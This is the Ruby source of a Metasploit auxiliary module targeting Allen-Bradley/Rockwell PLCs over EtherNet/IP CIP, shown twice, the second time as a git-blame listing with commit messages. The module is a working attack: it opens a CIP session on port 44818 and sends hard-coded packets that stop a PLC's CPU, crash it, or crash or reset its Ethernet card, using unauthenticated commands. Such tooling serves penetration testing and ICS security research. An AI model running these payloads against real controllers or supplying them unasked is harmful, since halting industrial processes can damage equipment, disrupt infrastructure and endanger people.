metasploit-framework/modules/auxiliary/admin/scada/multi_cip_command.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::Tcp
  include Rex::Socket::Tcp

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Allen-Bradley/Rockwell Automation EtherNet/IP CIP Commands',
      'Description'    => %q{
        The EtnerNet/IP CIP protocol allows a number of unauthenticated commands to a PLC which
        implements the protocol.  This module implements the CPU STOP command, as well as
        the ability to crash the Ethernet card in an affected device.

        This module is based on the original 'ethernetip-multi.rb' Basecamp module
        from DigitalBond.
      },
      'Author'         =>
        [
          'Ruben Santamarta <ruben[at]reversemode.com>',
          'K. Reid Wightman <wightman[at]digitalbond.com>', # original module
          'todb' # Metasploit fixups
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]
        ],
      'DisclosureDate' => 'Jan 19 2012'))

    register_options(
      [
        Opt::RPORT(44818),
        # Note that OptEnum is case sensitive
        OptEnum.new("ATTACK", [true, "The attack to use.", "STOPCPU",
          [
            "STOPCPU",
            "CRASHCPU",
            "CRASHETHER",
            "RESETETHER"
          ]
        ])
      ], self.class
    )
  end

  def run
    attack = datastore["ATTACK"]
    print_status "#{rhost}:#{rport} - CIP - Running #{attack} attack."
    sid = req_session
    if sid
      forge_packet(sid, payload(attack))
      print_status "#{rhost}:#{rport} - CIP - #{attack} attack complete."
    end
  end

  def forge_packet(sessionid, payload)
    packet = ""
    packet += "\x6f\x00" # command: Send request/reply data
    packet += [payload.size - 0x10].pack("v") # encap length (2 bytes)
    packet += [sessionid].pack("N") # session identifier (4 bytes)
    packet += payload #payload part
    begin
      sock.put(packet)
    rescue ::Interrupt
      print_error("#{rhost}:#{rport} - CIP - Interrupt during payload")
      raise $!
    rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused
      print_error("#{rhost}:#{rport} - CIP - Network error during payload")
      return nil
    end
  end

  def req_session
    begin
      connect
      packet = ""
      packet += "\x65\x00" # ENCAP_CMD_REGISTERSESSION (2 bytes)
      packet += "\x04\x00" # encaph_length (2 bytes)
      packet += "\x00\x00\x00\x00" # session identifier (4 bytes)
      packet += "\x00\x00\x00\x00" # status code (4 bytes)
      packet += "\x00\x00\x00\x00\x00\x00\x00\x00" # context information (8 bytes)
      packet += "\x00\x00\x00\x00" # options flags (4 bytes)
      packet += "\x01\x00" # proto (2 bytes)
      packet += "\x00\x00" # flags (2 bytes)
      sock.put(packet)
      response = sock.get_once
      if response
        session_id = response[4..8].unpack("N")[0] rescue nil# bare minimum of parsing done
        if session_id
          print_status("#{rhost}:#{rport} - CIP - Got session id: 0x"+session_id.to_s(16))
        else
          print_error("#{rhost}:#{rport} - CIP - Got invalid session id, aborting.")
          return nil
        end
      else
        raise ::Rex::ConnectionTimeout
      end
    rescue ::Interrupt
      print_error("#{rhost}:#{rport} - CIP - Interrupt during session negotation")
      raise $!
    rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused => e
      print_error("#{rhost}:#{rport} - CIP - Network error during session negotiation: #{e}")
      return nil
    end
    return session_id
  end

  def cleanup
    disconnect rescue nil
  end

  def payload(attack)
    case attack
    when "STOPCPU"
      payload =  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + #encapsulation -[payload.size-0x10]-
      "\x00\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\xb2\x00\x1a\x00" + #packet1
      "\x52\x02\x20\x06\x24\x01\x03\xf0\x0c\x00\x07\x02\x20\x64\x24\x01" + #packet2
      "\xDE\xAD\xBE\xEF\xCA\xFE\x01\x00\x01\x00"                           #packet3
    when "CRASHCPU"
      payload = "\x00\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\xb2\x00\x1a\x00" +
      "\x52\x02\x20\x06\x24\x01\x03\xf0\x0c\x00\x0a\x02\x20\x02\x24\x01" +
      "\xf4\xf0\x09\x09\x88\x04\x01\x00\x01\x00"
    when "CRASHETHER"
      payload = "\x00\x00\x00\x00\x20\x00\x02\x00\x00\x00\x00\x00\xb2\x00\x0c\x00" +
      "\x0e\x03\x20\xf5\x24\x01\x10\x43\x24\x01\x10\x43"
    when "RESETETHER"
      payload = "\x00\x00\x00\x00\x00\x04\x02\x00\x00\x00\x00\x00\xb2\x00\x08\x00" +
      "\x05\x03\x20\x01\x24\x01\x30\x03"
    else
      print_error("#{rhost}:#{rport} - CIP - Invalid attack option.")
      return nil
    end
  end

end
Adding DigitalBond SCADA modules 2012-04-05 17:35:21 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding DigitalBond SCADA modules 2012-04-05 17:35:21 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Auxiliary`

Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::Tcp`
			`include Rex::Socket::Tcp`
Adding DigitalBond SCADA modules 2012-04-05 17:35:21 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => 'Allen-Bradley/Rockwell Automation EtherNet/IP CIP Commands',`
			`'Description' => %q{`
			`The EtnerNet/IP CIP protocol allows a number of unauthenticated commands to a PLC which`
			`implements the protocol. This module implements the CPU STOP command, as well as`
			`the ability to crash the Ethernet card in an affected device.`
Adding DigitalBond SCADA modules 2012-04-05 17:35:21 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`This module is based on the original 'ethernetip-multi.rb' Basecamp module`
			`from DigitalBond.`
			`},`
			`'Author' =>`
			`[`
			`'Ruben Santamarta <ruben[at]reversemode.com>',`
			`'K. Reid Wightman <wightman[at]digitalbond.com>', # original module`
			`'todb' # Metasploit fixups`
			`],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]`
			`],`
			`'DisclosureDate' => 'Jan 19 2012'))`
Adding DigitalBond SCADA modules 2012-04-05 17:35:21 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`register_options(`
			`[`
			`Opt::RPORT(44818),`
			`# Note that OptEnum is case sensitive`
			`OptEnum.new("ATTACK", [true, "The attack to use.", "STOPCPU",`
			`[`
			`"STOPCPU",`
			`"CRASHCPU",`
			`"CRASHETHER",`
			`"RESETETHER"`
			`]`
			`])`
			`], self.class`
			`)`
			`end`
Adding DigitalBond SCADA modules 2012-04-05 17:35:21 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def run`
			`attack = datastore["ATTACK"]`
			`print_status "#{rhost}:#{rport} - CIP - Running #{attack} attack."`
			`sid = req_session`
			`if sid`
			`forge_packet(sid, payload(attack))`
			`print_status "#{rhost}:#{rport} - CIP - #{attack} attack complete."`
			`end`
			`end`
Adding DigitalBond SCADA modules 2012-04-05 17:35:21 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def forge_packet(sessionid, payload)`
			`packet = ""`
			`packet += "\x6f\x00" # command: Send request/reply data`
			`packet += [payload.size - 0x10].pack("v") # encap length (2 bytes)`
			`packet += [sessionid].pack("N") # session identifier (4 bytes)`
			`packet += payload #payload part`
			`begin`
			`sock.put(packet)`
			`rescue ::Interrupt`
			`print_error("#{rhost}:#{rport} - CIP - Interrupt during payload")`
			`raise $!`
			`rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused`
			`print_error("#{rhost}:#{rport} - CIP - Network error during payload")`
			`return nil`
			`end`
			`end`
Adding DigitalBond SCADA modules 2012-04-05 17:35:21 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def req_session`
			`begin`
			`connect`
			`packet = ""`
			`packet += "\x65\x00" # ENCAP_CMD_REGISTERSESSION (2 bytes)`
			`packet += "\x04\x00" # encaph_length (2 bytes)`
			`packet += "\x00\x00\x00\x00" # session identifier (4 bytes)`
			`packet += "\x00\x00\x00\x00" # status code (4 bytes)`
			`packet += "\x00\x00\x00\x00\x00\x00\x00\x00" # context information (8 bytes)`
			`packet += "\x00\x00\x00\x00" # options flags (4 bytes)`
			`packet += "\x01\x00" # proto (2 bytes)`
			`packet += "\x00\x00" # flags (2 bytes)`
			`sock.put(packet)`
			`response = sock.get_once`
			`if response`
			`session_id = response[4..8].unpack("N")[0] rescue nil# bare minimum of parsing done`
			`if session_id`
			`print_status("#{rhost}:#{rport} - CIP - Got session id: 0x"+session_id.to_s(16))`
			`else`
			`print_error("#{rhost}:#{rport} - CIP - Got invalid session id, aborting.")`
			`return nil`
			`end`
			`else`
			`raise ::Rex::ConnectionTimeout`
			`end`
			`rescue ::Interrupt`
			`print_error("#{rhost}:#{rport} - CIP - Interrupt during session negotation")`
			`raise $!`
			`rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused => e`
			`print_error("#{rhost}:#{rport} - CIP - Network error during session negotiation: #{e}")`
			`return nil`
			`end`
			`return session_id`
			`end`
Adding DigitalBond SCADA modules 2012-04-05 17:35:21 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def cleanup`
			`disconnect rescue nil`
			`end`
Adding DigitalBond SCADA modules 2012-04-05 17:35:21 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def payload(attack)`
			`case attack`
			`when "STOPCPU"`
			`payload = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + #encapsulation -[payload.size-0x10]-`
			`"\x00\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\xb2\x00\x1a\x00" + #packet1`
			`"\x52\x02\x20\x06\x24\x01\x03\xf0\x0c\x00\x07\x02\x20\x64\x24\x01" + #packet2`
			`"\xDE\xAD\xBE\xEF\xCA\xFE\x01\x00\x01\x00" #packet3`
			`when "CRASHCPU"`
			`payload = "\x00\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\xb2\x00\x1a\x00" +`
			`"\x52\x02\x20\x06\x24\x01\x03\xf0\x0c\x00\x0a\x02\x20\x02\x24\x01" +`
			`"\xf4\xf0\x09\x09\x88\x04\x01\x00\x01\x00"`
			`when "CRASHETHER"`
			`payload = "\x00\x00\x00\x00\x20\x00\x02\x00\x00\x00\x00\x00\xb2\x00\x0c\x00" +`
			`"\x0e\x03\x20\xf5\x24\x01\x10\x43\x24\x01\x10\x43"`
			`when "RESETETHER"`
			`payload = "\x00\x00\x00\x00\x00\x04\x02\x00\x00\x00\x00\x00\xb2\x00\x08\x00" +`
			`"\x05\x03\x20\x01\x24\x01\x30\x03"`
			`else`
			`print_error("#{rhost}:#{rport} - CIP - Invalid attack option.")`
			`return nil`
			`end`
			`end`
Adding DigitalBond SCADA modules 2012-04-05 17:35:21 +00:00
			`end`